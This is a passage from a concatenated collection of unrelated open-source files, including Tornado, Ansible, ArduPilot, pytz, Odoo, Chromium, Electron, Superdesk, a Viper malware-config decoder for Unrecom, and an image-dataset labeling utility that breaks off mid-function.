process.fork_processes(num_processes)
sockets = self._pending_sockets
self._pending_sockets = []
self.add_sockets(sockets)
def stop(self):
"""Stops listening for new connections.
Requests currently in progress may still continue after the
server is stopped.
"""
for fd, sock in self._sockets.items():
self.io_loop.remove_handler(fd)
sock.close()
def handle_stream(self, stream, address):
"""Override to handle a new `.IOStream` from an incoming connection."""
raise NotImplementedError()
def _handle_connection(self, connection, address):
if self.ssl_options is not None:
assert ssl, "Python 2.6+ and OpenSSL required for SSL"
try:
connection = ssl_wrap_socket(connection,
self.ssl_options,
server_side=True,
do_handshake_on_connect=False)
except ssl.SSLError as err:
if err.args[0] == ssl.SSL_ERROR_EOF:
return connection.close()
else:
raise
except socket.error as err:
# If the connection is closed immediately after it is created
# (as in a port scan), we can get one of several errors.
# wrap_socket makes an internal call to getpeername,
# which may return either EINVAL (Mac OS X) or ENOTCONN
# (Linux). If it returns ENOTCONN, this error is
# silently swallowed by the ssl module, so we need to
# catch another error later on (AttributeError in
# SSLIOStream._do_ssl_handshake).
# To test this behavior, try nmap with the -sT flag.
# https://github.com/tornadoweb/tornado/pull/750
if errno_from_exception(err) in (errno.ECONNABORTED, errno.EINVAL):
return connection.close()
else:
raise
try:
if self.ssl_options is not None:
stream = SSLIOStream(connection, io_loop=self.io_loop,
max_buffer_size=self.max_buffer_size,
read_chunk_size=self.read_chunk_size)
else:
stream = IOStream(connection, io_loop=self.io_loop,
max_buffer_size=self.max_buffer_size,
read_chunk_size=self.read_chunk_size)
self.handle_stream(stream, address)
except Exception:
app_log.error("Error in connection callback", exc_info=True)
| apache-2.0 |
alexlo03/ansible | lib/ansible/modules/windows/win_route.py | 21 | 1660 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2017, Daniele Lazzari <lazzari@mailup.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# This is a windows documentation stub. Actual code lives in the .ps1
# file of the same name.
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: win_route
version_added: "2.4"
short_description: Add or remove a static route
description:
- Add or remove a static route.
options:
destination:
description:
- Destination IP address in CIDR format (ip address/prefix length)
required: yes
gateway:
description:
- The gateway used by the static route.
- If C(gateway) is not provided it will be set to C(0.0.0.0).
metric:
description:
- Metric used by the static route.
type: int
default: 1
state:
description:
- If C(absent), it removes a network static route.
- If C(present), it adds a network static route.
choices: [ absent, present ]
default: present
notes:
- Works only with Windows 2012 R2 and newer.
author:
- Daniele Lazzari
'''
EXAMPLES = r'''
---
- name: Add a network static route
win_route:
destination: 192.168.2.10/32
gateway: 192.168.1.1
metric: 1
state: present
- name: Remove a network static route
win_route:
destination: 192.168.2.10/32
state: absent
'''
RETURN = r'''
output:
description: A message describing the task result.
returned: always
type: string
sample: "Route added"
'''
| gpl-3.0 |
kellyschrock/ardupilot | Tools/scripts/configure_all.py | 4 | 2215 | #!/usr/bin/env python
"""
script to run configure for all hwdef.dat files, to check for syntax errors
"""
import os
import shutil
import subprocess
import sys
import fnmatch
import argparse
parser = argparse.ArgumentParser(description='configure all ChibiOS boards')
parser.add_argument('--build', action='store_true', default=False, help='build as well as configure')
parser.add_argument('--stop', action='store_true', default=False, help='stop on build fail')
parser.add_argument('--pattern', default='*')
args = parser.parse_args()
os.environ['PYTHONUNBUFFERED'] = '1'
failures = []
def get_board_list():
    '''add boards based on existence of hwdef.dat in subdirectories for ChibiOS'''
board_list = []
dirname, dirlist, filenames = next(os.walk('libraries/AP_HAL_ChibiOS/hwdef'))
for d in dirlist:
hwdef = os.path.join(dirname, d, 'hwdef.dat')
if os.path.exists(hwdef):
board_list.append(d)
return board_list
def run_program(cmd_list, build):
print("Running (%s)" % " ".join(cmd_list))
retcode = subprocess.call(cmd_list)
if retcode != 0:
print("Build failed: %s %s" % (build, ' '.join(cmd_list)))
global failures
failures.append(build)
if args.stop:
sys.exit(1)
for board in get_board_list():
if not fnmatch.fnmatch(board, args.pattern):
continue
print("Configuring for %s" % board)
run_program(["./waf", "configure", "--board", board], "configure: " + board)
if args.build:
if board == "iomcu":
target = "iofirmware"
else:
target = "copter"
run_program(["./waf", target], "build: " + board)
# check for bootloader def
hwdef_bl = os.path.join('libraries/AP_HAL_ChibiOS/hwdef/%s/hwdef-bl.dat' % board)
if os.path.exists(hwdef_bl):
print("Configuring bootloader for %s" % board)
run_program(["./waf", "configure", "--board", board, "--bootloader"], "configure: " + board + "-bl")
if args.build:
run_program(["./waf", "bootloader"], "build: " + board + "-bl")
if len(failures) > 0:
print("Failed builds:")
for f in failures:
print(' ' + f)
sys.exit(1)
sys.exit(0)
| gpl-3.0 |
kenshay/ImageScript | ProgramData/SystemFiles/Python/Lib/site-packages/pytz/lazy.py | 514 | 5263 | from threading import RLock
try:
from UserDict import DictMixin
except ImportError:
from collections import Mapping as DictMixin
# With lazy loading, we might end up with multiple threads triggering
# it at the same time. We need a lock.
_fill_lock = RLock()
class LazyDict(DictMixin):
"""Dictionary populated on first use."""
data = None
def __getitem__(self, key):
if self.data is None:
_fill_lock.acquire()
try:
if self.data is None:
self._fill()
finally:
_fill_lock.release()
return self.data[key.upper()]
def __contains__(self, key):
if self.data is None:
_fill_lock.acquire()
try:
if self.data is None:
self._fill()
finally:
_fill_lock.release()
return key in self.data
def __iter__(self):
if self.data is None:
_fill_lock.acquire()
try:
if self.data is None:
self._fill()
finally:
_fill_lock.release()
return iter(self.data)
def __len__(self):
if self.data is None:
_fill_lock.acquire()
try:
if self.data is None:
self._fill()
finally:
_fill_lock.release()
return len(self.data)
def keys(self):
if self.data is None:
_fill_lock.acquire()
try:
if self.data is None:
self._fill()
finally:
_fill_lock.release()
return self.data.keys()
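# Example subclass (an illustrative sketch, not part of this module):
# concrete lazy dictionaries provide a _fill() method that populates
# self.data on first access; note that __getitem__ uppercases the key.
#
#     class LazyCodes(LazyDict):
#         def _fill(self):
#             self.data = {'US': 'United States', 'GB': 'United Kingdom'}
#
#     codes = LazyCodes()
#     codes['us']  # triggers _fill() and returns 'United States'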
class LazyList(list):
"""List populated on first use."""
_props = [
'__str__', '__repr__', '__unicode__',
'__hash__', '__sizeof__', '__cmp__',
'__lt__', '__le__', '__eq__', '__ne__', '__gt__', '__ge__',
'append', 'count', 'index', 'extend', 'insert', 'pop', 'remove',
'reverse', 'sort', '__add__', '__radd__', '__iadd__', '__mul__',
'__rmul__', '__imul__', '__contains__', '__len__', '__nonzero__',
'__getitem__', '__setitem__', '__delitem__', '__iter__',
'__reversed__', '__getslice__', '__setslice__', '__delslice__']
def __new__(cls, fill_iter=None):
if fill_iter is None:
return list()
# We need a new class as we will be dynamically messing with its
# methods.
class LazyList(list):
pass
fill_iter = [fill_iter]
def lazy(name):
def _lazy(self, *args, **kw):
_fill_lock.acquire()
try:
if len(fill_iter) > 0:
list.extend(self, fill_iter.pop())
for method_name in cls._props:
delattr(LazyList, method_name)
finally:
_fill_lock.release()
return getattr(list, name)(self, *args, **kw)
return _lazy
for name in cls._props:
setattr(LazyList, name, lazy(name))
new_list = LazyList()
return new_list
# Not all versions of Python declare the same magic methods.
# Filter out properties that don't exist in this version of Python
# from the list.
LazyList._props = [prop for prop in LazyList._props if hasattr(list, prop)]
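# Example usage (illustrative): the fill iterable is consumed only when
# the list is first touched; afterwards the patched methods are removed
# and the instance behaves like a plain list.
#
#     zones = LazyList(iter(['UTC', 'GMT']))  # nothing consumed yet
#     zones[0]  # first access fills the list and returns 'UTC'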
class LazySet(set):
"""Set populated on first use."""
_props = (
'__str__', '__repr__', '__unicode__',
'__hash__', '__sizeof__', '__cmp__',
'__lt__', '__le__', '__eq__', '__ne__', '__gt__', '__ge__',
'__contains__', '__len__', '__nonzero__',
'__getitem__', '__setitem__', '__delitem__', '__iter__',
'__sub__', '__and__', '__xor__', '__or__',
'__rsub__', '__rand__', '__rxor__', '__ror__',
'__isub__', '__iand__', '__ixor__', '__ior__',
'add', 'clear', 'copy', 'difference', 'difference_update',
'discard', 'intersection', 'intersection_update', 'isdisjoint',
'issubset', 'issuperset', 'pop', 'remove',
'symmetric_difference', 'symmetric_difference_update',
'union', 'update')
def __new__(cls, fill_iter=None):
if fill_iter is None:
return set()
class LazySet(set):
pass
fill_iter = [fill_iter]
def lazy(name):
def _lazy(self, *args, **kw):
_fill_lock.acquire()
try:
if len(fill_iter) > 0:
for i in fill_iter.pop():
set.add(self, i)
for method_name in cls._props:
delattr(LazySet, method_name)
finally:
_fill_lock.release()
return getattr(set, name)(self, *args, **kw)
return _lazy
for name in cls._props:
setattr(LazySet, name, lazy(name))
new_set = LazySet()
return new_set
# Not all versions of Python declare the same magic methods.
# Filter out properties that don't exist in this version of Python
# from the list.
LazySet._props = [prop for prop in LazySet._props if hasattr(set, prop)]
| gpl-3.0 |
lynndotconfig/server-tools | language_path_mixin/__openerp__.py | 13 | 1370 | # -*- coding: utf-8 -*-
##############################################################################
#
# Odoo, an open source suite of business apps
# This module copyright (C) 2015 Therp BV (<http://therp.nl>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Language path mixin',
'summary': "Setting the partner's language in RML reports",
'version': '1.0',
'author': 'Therp BV,Odoo Community Association (OCA)',
'maintainer': 'Odoo Community Association (OCA)',
'website': 'https://github.com/OCA/server-tools',
'license': 'AGPL-3',
'category': 'Tools',
'depends': [
'base',
],
}
| agpl-3.0 |
Teamxrtc/webrtc-streaming-node | third_party/webrtc/src/chromium/src/tools/findit/match_set.py | 48 | 4429 | # Copyright (c) 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import re
from threading import Lock
import crash_utils
REVIEW_URL_PATTERN = re.compile(r'Review URL:( *)(.*?)/(\d+)')
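# Matches commit-message lines such as
# "Review URL: https://codereview.chromium.org/12345"; group(3) captures
# the issue number ("12345" in this example).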
class Match(object):
"""Represents a match entry.
A match is a CL that is suspected to have caused the crash. A match object
contains information about files it changes, their authors, etc.
Attributes:
is_revert: True if this CL is reverted by other CL.
revert_of: If this CL is a revert of some other CL, a revision number/
git hash of that CL.
crashed_line_numbers: The list of lines that caused crash for this CL.
function_list: The list of functions that caused the crash.
min_distance: The minimum distance between the lines that CL changed and
lines that caused the crash.
changed_files: The list of files that the CL changed.
changed_file_urls: The list of URLs for the file.
author: The author of the CL.
component_name: The name of the component that this CL belongs to.
stack_frame_indices: For files that caused crash, list of where in the
stackframe they occur.
    priorities: A list of priorities for each of the changed files. A priority
                is 1 if the file changes a crashed line, and 2 if it changes
                the file but not the crashed line.
    revision_url: The revision URL of the CL.
review_url: The codereview URL that reviews this CL.
reviewers: The list of people that reviewed this CL.
reason: The reason why this CL is suspected.
time: When this CL was committed.
"""
REVERT_PATTERN = re.compile(r'(revert\w*) r?(\d+)', re.I)
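  # Matches e.g. "Revert 123456" or "Reverted r123456" (case-insensitive);
  # group(2) captures the revision number of the reverted CL.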
def __init__(self, revision, component_name):
self.is_revert = False
self.revert_of = None
self.message = None
self.crashed_line_numbers = []
self.function_list = []
self.min_distance = crash_utils.INFINITY
self.min_distance_info = None
self.changed_files = []
self.changed_file_urls = []
self.author = revision['author']
self.component_name = component_name
self.stack_frame_indices = []
self.priorities = []
self.revision_url = revision['url']
self.review_url = ''
self.reviewers = []
self.reason = None
self.time = revision['time']
def ParseMessage(self, message, codereview_api_url):
"""Parses the message.
It checks the message to extract the code review website and list of
reviewers, and it also checks if the CL is a revert of another CL.
Args:
message: The message to parse.
codereview_api_url: URL to retrieve codereview data from.
"""
self.message = message
for line in message.splitlines():
line = line.strip()
review_url_line_match = REVIEW_URL_PATTERN.match(line)
# Check if the line has the code review information.
if review_url_line_match:
# Get review number for the code review site from the line.
issue_number = review_url_line_match.group(3)
# Get JSON from the code review site, ignore the line if it fails.
url = codereview_api_url % issue_number
json_string = crash_utils.GetDataFromURL(url)
if not json_string:
continue
# Load the JSON from the string, and get the list of reviewers.
code_review = crash_utils.LoadJSON(json_string)
if code_review:
self.reviewers = code_review['reviewers']
# Check if this CL is a revert of other CL.
if line.lower().startswith('revert'):
self.is_revert = True
# Check if the line says what CL this CL is a revert of.
revert = self.REVERT_PATTERN.match(line)
if revert:
self.revert_of = revert.group(2)
return
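

# Illustrative sketch (not part of the original pipeline; the commit message
# and numbers below are hypothetical): how the two regexes above classify a
# commit message.
def _example_match_patterns():
  message = ('Revert 12345 "Fix the crash"\n'
             'Review URL: https://codereview.chromium.org/67890')
  for line in message.splitlines():
    review = REVIEW_URL_PATTERN.match(line)
    if review:
      print review.group(3)  # '67890' -- the codereview issue number.
    revert = Match.REVERT_PATTERN.match(line)
    if revert:
      print revert.group(2)  # '12345' -- the reverted revision.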
class MatchSet(object):
"""Represents a set of matches.
Attributes:
matches: A map from CL to a match object.
cls_to_ignore: A set of CLs to ignore.
matches_lock: A lock guarding matches dictionary.
"""
def __init__(self, codereview_api_url):
self.codereview_api_url = codereview_api_url
self.matches = {}
self.cls_to_ignore = set()
self.matches_lock = Lock()
def RemoveRevertedCLs(self):
"""Removes CLs that are revert."""
for cl in self.matches:
if cl in self.cls_to_ignore:
del self.matches[cl]
| mit |
dongjoon-hyun/electron | script/update.py | 18 | 3148 | #!/usr/bin/env python
import argparse
import os
import platform
import subprocess
import sys
from lib.config import get_target_arch, PLATFORM
from lib.util import get_host_arch, import_vs_env
SOURCE_ROOT = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
def main():
os.chdir(SOURCE_ROOT)
if PLATFORM != 'win32' and platform.architecture()[0] != '64bit':
    print 'Electron must be built on a 64bit machine'
return 1
update_external_binaries()
return update_gyp()
def parse_args():
parser = argparse.ArgumentParser(description='Update build configurations')
parser.add_argument('--defines', default='',
help='The build variables passed to gyp')
parser.add_argument('--msvs', action='store_true',
help='Generate Visual Studio project')
return parser.parse_args()
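

# Example invocation (illustrative; the extra define is hypothetical):
#
#   python script/update.py --defines='clang=1' --msvs
#
# runs gyp up to twice -- with -Dlibchromiumcontent_component=0 and, if
# that succeeds, with -Dlibchromiumcontent_component=1 -- passing
# -Dclang=1 each time and generating Visual Studio projects through the
# msvs-ninja generator.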
def update_external_binaries():
uf = os.path.join('script', 'update-external-binaries.py')
subprocess.check_call([sys.executable, uf])
def update_gyp():
  # Since gyp doesn't support specifying link_settings per configuration,
  # we are not able to link to different libraries in the "Debug" and
  # "Release" configurations.
  # To work around this, we generate the configuration twice: once for the
  # "Debug" config and once for the "Release" config. The setting is
  # controlled by the "libchromiumcontent_component" variable, which is
  # defined before running gyp.
target_arch = get_target_arch()
return (run_gyp(target_arch, 0) or run_gyp(target_arch, 1))
def run_gyp(target_arch, component):
# Update the VS build env.
import_vs_env(target_arch)
env = os.environ.copy()
if PLATFORM == 'linux' and target_arch != get_host_arch():
env['GYP_CROSSCOMPILE'] = '1'
elif PLATFORM == 'win32':
env['GYP_MSVS_VERSION'] = '2015'
python = sys.executable
if sys.platform == 'cygwin':
# Force using win32 python on cygwin.
python = os.path.join('vendor', 'python_26', 'python.exe')
gyp = os.path.join('vendor', 'brightray', 'vendor', 'gyp', 'gyp_main.py')
gyp_pylib = os.path.join(os.path.dirname(gyp), 'pylib')
# Avoid using the old gyp lib in system.
env['PYTHONPATH'] = os.path.pathsep.join([gyp_pylib,
env.get('PYTHONPATH', '')])
# Whether to build for Mac App Store.
  mas_build = 1 if 'MAS_BUILD' in os.environ else 0
defines = [
'-Dlibchromiumcontent_component={0}'.format(component),
'-Dtarget_arch={0}'.format(target_arch),
'-Dhost_arch={0}'.format(get_host_arch()),
'-Dlibrary=static_library',
'-Dmas_build={0}'.format(mas_build),
]
# Add the defines passed from command line.
args = parse_args()
for define in [d.strip() for d in args.defines.split(' ')]:
if define:
defines += ['-D' + define]
generator = 'ninja'
if args.msvs:
generator = 'msvs-ninja'
return subprocess.call([python, gyp, '-f', generator, '--depth', '.',
'electron.gyp', '-Icommon.gypi'] + defines, env=env)
if __name__ == '__main__':
sys.exit(main())
| mit |
superdesk/superdesk-content-api | content_api/tests/packages_init_app_test.py | 13 | 2280 | # -*- coding: utf-8; -*-
#
# This file is part of Superdesk.
#
# Copyright 2013, 2014, 2015 Sourcefabric z.u. and contributors.
#
# For the full copyright and license information, please see the
# AUTHORS and LICENSE files distributed with this source code, or
# at https://www.sourcefabric.org/superdesk/license
from unittest import mock
from unittest.mock import MagicMock
from content_api.tests import ApiTestCase
_fake_packages_resource = MagicMock()
_fake_packages_service = MagicMock()
_fake_backend = MagicMock(name='superdesk backend')
def _fake_get_backend():
"""Return mocked superdesk backend."""
return _fake_backend
class FakePackagesService():
def __init__(self, datasource, backend=None):
self.datasource = datasource
self.backend = backend
def __eq__(self, other):
return (
self.datasource == other.datasource and
self.backend is other.backend
)
def __ne__(self, other):
return not self.__eq__(other)
@mock.patch('content_api.packages.PackagesResource', _fake_packages_resource)
@mock.patch('content_api.packages.PackagesService', FakePackagesService)
@mock.patch('superdesk.get_backend', _fake_get_backend)
class PackagesInitAppTestCase(ApiTestCase):
    """Base class for the `packages.init_app` function tests."""
def _get_target_function(self):
"""Return the function under test.
Make the test fail immediately if the function cannot be imported.
"""
try:
from content_api.packages import init_app
except ImportError:
self.fail("Could not import function under test (init_app).")
else:
return init_app
def test_instantiates_packages_resource_with_correct_arguments(self):
fake_app = MagicMock(name='app')
fake_packages_service = FakePackagesService('packages', _fake_get_backend())
init_app = self._get_target_function()
init_app(fake_app)
self.assertTrue(_fake_packages_resource.called)
args, kwargs = _fake_packages_resource.call_args
self.assertTrue(len(args) > 0 and args[0] == 'packages')
self.assertIs(kwargs.get('app'), fake_app)
self.assertEqual(kwargs.get('service'), fake_packages_service)
| agpl-3.0 |
jahrome/viper | modules/rats/unrecom.py | 6 | 2755 | # Originally written by Kevin Breen (@KevTheHermit):
# https://github.com/kevthehermit/RATDecoders/blob/master/unrecom.py
import string
from zipfile import ZipFile
from cStringIO import StringIO
from Crypto.Cipher import ARC4
import xml.etree.ElementTree as ET
from viper.common.out import *
def extract_embedded(zip_data):
    raw_embedded = None
    enckey = None
    archive = StringIO(zip_data)
    with ZipFile(archive) as zip:
        for name in zip.namelist():  # get all the file names
            if name == "load/ID":  # contains the first part of the key
                partial_key = zip.read(name)
                enckey = partial_key + 'DESW7OWKEJRU4P2K'  # complete the key
                print_info("Encryption Key {0}".format(partial_key))
            if name == "load/MANIFEST.MF":  # this is the embedded jar
                raw_embedded = zip.read(name)
    if raw_embedded is None or enckey is None:
        # Bail out if either the key material or the embedded jar is missing.
        return None
    # Decrypt the raw file.
    return decrypt_arc4(enckey, raw_embedded)
def parse_embedded(data):
newzipdata = data
newZip = StringIO(newzipdata) # Write new zip file to memory instead of to disk
with ZipFile(newZip) as zip:
for name in zip.namelist():
if name == "config.xml": # this is the config in clear
config = zip.read(name)
return config
def decrypt_arc4(enckey, data):
    cipher = ARC4.new(enckey)  # set up the cipher
    return cipher.decrypt(data)  # decrypt the data
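

# Minimal round-trip sketch (the sample key material is hypothetical): the
# dropper stores only the first half of the RC4 key in load/ID; appending
# the static suffix completes it, so decryption is a single ARC4 pass.
def _example_roundtrip():
    partial_key = 'ABCD1234'  # stand-in for the contents of load/ID
    enckey = partial_key + 'DESW7OWKEJRU4P2K'
    ciphertext = ARC4.new(enckey).encrypt('embedded jar bytes')
    assert decrypt_arc4(enckey, ciphertext) == 'embedded jar bytes'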
def parse_config(config):
    # Strip non-printable characters before parsing the XML.
    xml = filter(lambda x: x in string.printable, config)
root = ET.fromstring(xml)
raw_config = {}
for child in root:
if child.text.startswith("Unrecom"):
raw_config["Version"] = child.text
else:
raw_config[child.attrib["key"]] = child.text
new_config = {}
new_config['Version'] = raw_config['Version']
new_config['Delay'] = raw_config['delay']
new_config['Domain'] = raw_config['dns']
new_config['Extension'] = raw_config['extensionname']
new_config['Install'] = raw_config['install']
new_config['Port1'] = raw_config['p1']
new_config['Port2'] = raw_config['p2']
new_config['Password'] = raw_config['password']
new_config['PluginFolder'] = raw_config['pluginfoldername']
new_config['Prefix'] = raw_config['prefix']
return new_config
def config(data):
embedded = extract_embedded(data)
if embedded is not None:
config = parse_embedded(embedded)
else:
return None
if config is not None:
return parse_config(config)
else:
return None
| bsd-3-clause |
kirca/odoo | addons/point_of_sale/wizard/pos_box.py | 381 | 2211 |
from openerp.osv import osv
from openerp.tools.translate import _
from openerp.addons.account.wizard.pos_box import CashBox
class PosBox(CashBox):
_register = False
def run(self, cr, uid, ids, context=None):
if not context:
context = dict()
active_model = context.get('active_model', False) or False
active_ids = context.get('active_ids', []) or []
if active_model == 'pos.session':
records = self.pool[active_model].browse(cr, uid, active_ids, context=context)
bank_statements = [record.cash_register_id for record in records if record.cash_register_id]
if not bank_statements:
raise osv.except_osv(_('Error!'),
_("There is no cash register for this PoS Session"))
return self._run(cr, uid, ids, bank_statements, context=context)
else:
return super(PosBox, self).run(cr, uid, ids, context=context)
class PosBoxIn(PosBox):
_inherit = 'cash.box.in'
def _compute_values_for_statement_line(self, cr, uid, box, record, context=None):
if context is None:
context = {}
values = super(PosBoxIn, self)._compute_values_for_statement_line(cr, uid, box, record, context=context)
active_model = context.get('active_model', False) or False
active_ids = context.get('active_ids', []) or []
if active_model == 'pos.session':
session = self.pool[active_model].browse(cr, uid, active_ids, context=context)[0]
values['ref'] = session.name
return values
class PosBoxOut(PosBox):
_inherit = 'cash.box.out'
def _compute_values_for_statement_line(self, cr, uid, box, record, context=None):
values = super(PosBoxOut, self)._compute_values_for_statement_line(cr, uid, box, record, context=context)
active_model = context.get('active_model', False) or False
active_ids = context.get('active_ids', []) or []
if active_model == 'pos.session':
session = self.pool[active_model].browse(cr, uid, active_ids, context=context)[0]
values['ref'] = session.name
return values
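

# Illustrative usage sketch (ids and context values are hypothetical): when
# the wizard is launched from a PoS session, the session arrives through the
# context, and the resulting statement line's ``ref`` is set to the session
# name.
#
#   ctx = {'active_model': 'pos.session', 'active_ids': [session_id]}
#   self.pool['cash.box.in'].run(cr, uid, [wizard_id], context=ctx)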
| agpl-3.0 |
srm912/servo | tests/wpt/css-tests/tools/pywebsocket/src/test/set_sys_path.py | 496 | 1815 | # Copyright 2009, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Configuration for testing.
Test files should import this module before mod_pywebsocket.
"""
import os
import sys
# Add the parent directory to sys.path to enable importing mod_pywebsocket.
sys.path.insert(0, os.path.join(os.path.split(__file__)[0], '..'))
# vi:sts=4 sw=4 et
| mpl-2.0 |
CUFCTL/DLBD | Spring2018/src/utils.py | 1 | 16622 | ### Import necessary packages
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from xml.etree import ElementTree as et
import cv2, os, sys, shutil, glob, argparse, re, io
import numpy as np
import tensorflow as tf
import PIL, hashlib, logging
from PIL import Image
from lxml import etree
from halo import Halo
from object_detection.utils import dataset_util
from object_detection.utils import label_map_util
RED = (0, 0, 255)
LWIDTH = 2
### Visualization Utilities
def get_bb(xml_file):
"""
Read the XML file and get ground truth bounding box
coordinates.
Parameters:
xml_file - file containing label information
Returns:
tuple - (xmin, xmax, ymin, ymax)
"""
# Open the XML file and parse the tree
with open(xml_file) as xf:
tree = et.parse(xf)
# Look for specific nodes and place into the tuple
xmin, xmax, ymin, ymax = None, None, None, None
for node in tree.iter():
if node.tag == 'xmin': xmin = int(node.text)
if node.tag == 'xmax': xmax = int(node.text)
if node.tag == 'ymin': ymin = int(node.text)
if node.tag == 'ymax': ymax = int(node.text)
return (xmin, xmax, ymin, ymax)
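

# Illustrative example (hypothetical label file): for an XML file containing
#   <xmin>10</xmin><xmax>50</xmax><ymin>20</ymin><ymax>60</ymax>
# get_bb('0001.xml') returns (10, 50, 20, 60).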
def draw_bb(img_path, oimg_path):
"""
    Draw bounding box on the given image and write to a new image.
NOTE: Assumes corresponding JPG and XML in same directory.
Parameters:
img_path - original image path
oimg_path - output image path
Returns:
None
"""
# Make sure output directory has been created
out_path = oimg_path.split('/')[:-1]
out_path = os.path.join('/', *out_path)
if not os.path.exists(out_path):
os.makedirs(out_path)
# Read input image
img = cv2.imread(img_path, cv2.IMREAD_UNCHANGED)
# Check to see if corresponding XML file (label) exists
xml_path = img_path.split('.')[0] + '.xml'
if not os.path.isfile(xml_path):
cv2.imwrite(oimg_path, img)
return
# Get bounding boxes from corresponding file
xmin, xmax, ymin, ymax = get_bb(xml_path)
    if xmin is None or xmax is None or ymin is None or ymax is None:
# Write output image without box
cv2.imwrite(oimg_path, img)
return
# Draw bounding box on image
cv2.rectangle(img, (xmin, ymin), (xmax, ymax), RED, LWIDTH)
# Write output image
cv2.imwrite(oimg_path, img)
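

# Usage sketch (paths are hypothetical):
#   draw_bb('/data/ci/360(12)-2/0001.jpg', '/data/out/360(12)-2/0001.jpg')
# reads 0001.xml from the same directory as the input image and writes a
# copy of the image with the ground-truth box drawn in red.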
### XML Utilities
def read_ci_xml(ci_xml, type_data):
"""
Read XML tree structure from CI XML file
Parameters:
ci_xml - XML file in CI format
type_data - 13-class or 100-class
Returns:
folder - directory where image is located
filename - name of corresponding image
database - database name
width - image width
height - image height
name - class name of object
xmax - bottom right x coordinate
xmin - top left x coordinate
ymax - bottom right y coordinate
ymin - top left y coordinate
"""
ci_tree = etree.parse(ci_xml)
root = ci_tree.getroot()
folder, filename, database = '', '', ''
name, width, height = '', '', ''
xmax, xmin, ymax, ymin = '', '', '', ''
for child in root:
if child.tag == 'folder':
folder = child.text
if child.tag == 'filename':
if child.text.split('.') == 'jpg':
filename = child.text
else:
filename = child.text + '.jpg'
if child.tag == 'source':
for child2 in child:
if child2.tag == 'database':
database = child2.text
if child.tag == 'size':
for child2 in child:
if child2.tag == 'width':
width = child2.text
if child2.tag == 'height':
height = child2.text
if child.tag == 'object':
for child2 in child:
if child2.tag == 'name':
if type_data == 13:
name = re.split(r'(\d+)', child2.text)[0]
else:
name = child2.text
if child2.tag == 'bndbox':
for child3 in child2:
if child3.tag == 'xmax':
xmax = child3.text
if child3.tag == 'xmin':
xmin = child3.text
if child3.tag == 'ymax':
ymax = child3.text
if child3.tag == 'ymin':
ymin = child3.text
return (folder, filename, database, width, height,
name, xmax, xmin, ymax, ymin)
def make_voc_directories(voc_path):
"""
Create directories for images and labels.
NOTE: Removes previously created directories.
Parameters:
voc_path - path to voc directory to create
Returns:
None
"""
if os.path.exists(voc_path):
shutil.rmtree(voc_path)
os.makedirs(voc_path)
os.makedirs(os.path.join(voc_path, 'CI2018'))
os.makedirs(os.path.join(voc_path, 'CI2018', 'Annotations'))
os.makedirs(os.path.join(voc_path, 'CI2018', 'JPEGImages'))
def determine_prepend(vid_path):
"""
Create the string to prepend to the file name.
Parameters:
vid_path - full path name to video directory
Returns:
prepend - string to prepend to filename.
"""
vid_1 = vid_path.rstrip('/').split('/')[-1].split('(')[0]
vid_2 = vid_path.rstrip('/').split('/')[-1].split('(')[-1].split(')')[0]
vid_3 = vid_path.rstrip('/').split('/')[-1].split('(')[-1].split(')')[-1].split('-')[-1]
if vid_1 == vid_2:
return vid_1
if vid_2 == vid_3:
return vid_1 + '_' + vid_2
else:
return vid_1 + '_' + vid_2 + '_' + vid_3
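

# Illustrative behavior on the CI naming scheme (inputs hypothetical):
#   determine_prepend('/data/360')       -> '360'
#   determine_prepend('/data/360(12)-2') -> '360_12_2'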
def copy_images(ci_path, voc_path):
"""
Copy images from the CI directory to VOC JPEGImages directory
while renaming all images.
Images are renamed by prepending the "video" (directory) name.
Ex: 360(12)-2/0001.jpg -> 360_12_2_0001.jpg
Parameters:
ci_path - path to original CI training data
voc_path - path to VOC JPEGImages directory to write to
Returns:
None
"""
for video in sorted(os.listdir(ci_path)):
if video == '.DS_Store': # For MAC
continue
vid_path = os.path.join(ci_path, video)
#prepend = determine_prepend(vid_path)
prepend = video
for filename in os.listdir(os.path.join(ci_path, video)):
if filename.split('.')[-1] == 'jpg':
jpg = os.path.join(ci_path, video, filename)
